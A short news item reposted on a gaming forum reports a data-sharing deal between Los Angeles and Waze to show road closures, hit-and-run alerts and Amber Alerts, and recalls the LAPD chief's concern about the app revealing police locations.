Alerts about hit-and-runs and kidnappings in Los Angeles will soon pop up on traffic app Waze, along with road closure information, the West Coast city's mayor said. The agreement is part of a data-sharing partnership between LA and the Google-owned tech company announced by Mayor Eric Garcetti. The app has already begun showing street closures and will start including hit-and-run alerts and so-called Amber Alerts sent out for kidnappings in the coming months. "This is going to be updated in real-time, every two minutes, giving motorists the information they need to... get home for dinner in time," said Garcetti. The agreement to add notifications about hit-and-run and kidnapping alerts was reached Monday "in a very good meeting" between Waze and LAPD Chief Charlie Beck," the mayor said. In January, it emerged that Beck had sent a letter to the tech company's CEO lamenting that the Waze application posed a danger to police because of its ability to track their locations. The LAPD chief said at the time that the shooter in a recent double murder of two New York police officers used the application to track the location of cops.1 point
-
1 point
About Us
CsBlackDevil Community [www.csblackdevil.com], a virtual world from May 1, 2012, which continues to grow in the gaming world. CSBD has over 65k members in continuous expansion, coming from different parts of the world.
Donate for a coffee☕